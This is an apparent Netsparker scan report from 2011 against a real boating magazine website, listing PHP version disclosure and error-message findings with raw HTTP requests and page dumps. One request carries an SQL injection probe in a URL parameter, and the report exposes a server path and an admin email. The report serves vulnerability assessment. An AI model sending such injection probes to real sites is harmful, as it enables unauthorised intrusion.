href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper">&l..
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /

/

http://www.soundingsonline.com/

Extracted Version

PHP/5.2.6

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:24:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Featuring Boating News, Stories and More | Soundings Online</title> <link href="/index.php?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/index.php?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_new_boats&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=195px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_mishaps_and_rescues&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=0&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_know_how&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=75px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_used_boat_review&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=195px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=newsshow1&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=130px&amp;img_width=0&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_seamanship_and_safety&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=0&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_blogs_and_columns&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=75px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&amp;text_block_bgcolor=ffffff&amp;text_block_width=195&amp;text_block_opacity=0&amp;text_block_margin=405&amp;module_width=615&amp;module_height=270&amp;thumbnail_bar=1&amp;thumbnail_width=66&amp;thumbnail_height=44&amp;thumbnail_margin=5&amp;thumbnail_border=1&amp;thumbnail_bar_position=1&amp;image_x=0&amp;image_y=0&amp;slides_count=4&amp;tick_x=405&amp;tick_y=-22" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script> <script type="text/javascript" src="http://www.soundingsonline.com/modules/mod_news_show_gk3/scripts/engine_compressed.js"></script> <script type="text/javascript" src="http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/engine_compress.js"></script> <script type="text/javascript" src="http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&amp;animation_slide_speed=500&amp;animation_interval=9000&amp;autoanimation=1&amp;animation_slide_type=0&amp;animation_text_type=0&amp;base_bgcolor=ffffff&amp;text_block_opacity=0&amp;thumbnail_width=66&amp;thumbnail_margin=5&amp;thumbnail_border=1&amp;thumbnail_border_color=a81c21&amp;thumbnail_border_color_inactive=ffffff&amp;interface_x=-20&amp;interface_y=0&amp;clickable_slides=1"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_home c_home m_home"><!--
Type of page: frontpage<br />Section: , s_home<br />Category: , c_home<br />Menu: 1, m_home-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></..
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /index.php

/index.php

http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id='%2B%20(sel..

Parameters

Parameter Type Value
option GET com_content
view GET category
layout GET blog
id GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
Itemid GET 111

Request

GET /index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/index.php" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Buying a Boat? Search on Soundingsonline.com</title> <link href="/buy-a-boat/'%20%20(select%20convert(int,CHAR(95)%20CHAR(33)%20CHAR(64)%20CHAR(50)%20CHAR(100)%20CHAR(105)%20CHAR(108)%20CHAR(101)%20CHAR(109)%20CHAR(109)%20CHAR(97))%20FROM%20syscolumns)%20%20'?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/buy-a-boat/'%20%20(select%20convert(int,CHAR(95)%20CHAR(33)%20CHAR(64)%20CHAR(50)%20CHAR(100)%20CHAR(105)%20CHAR(108)%20CHAR(101)%20CHAR(109)%20CHAR(109)%20CHAR(97))%20FROM%20syscolumns)%20%20'?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_sub_services c_uncategorized m_buy_a_boat"><!--
Type of page: category<br />Section: 15, s_sub_services<br />Category: 95, c_uncategorized<br />Menu: 111, m_buy_a_boat-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN..
Programming Error Message

Programming Error Message

1 TOTAL
LOW
Netsparker identified a programming error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. Source code, stack trace, etc. type data may be disclosed. Most of these issues will be identified and reported separately by Netsparker.

Remedy

Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or database then show this number and a static user-friendly error message to the user.
- /service-directory/

/service-directory/

http://www.soundingsonline.com/service-directory/

Identified Error Message

<b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in <b>E:\Inetpub\SoundingsOnline\libraries\joomla\database\database\mysql.php</b> on line <b>221</b>

Request

GET /service-directory/ HTTP/1.1
Referer: http://www.soundingsonline.com/service-directory/238412-advertising-contact-us
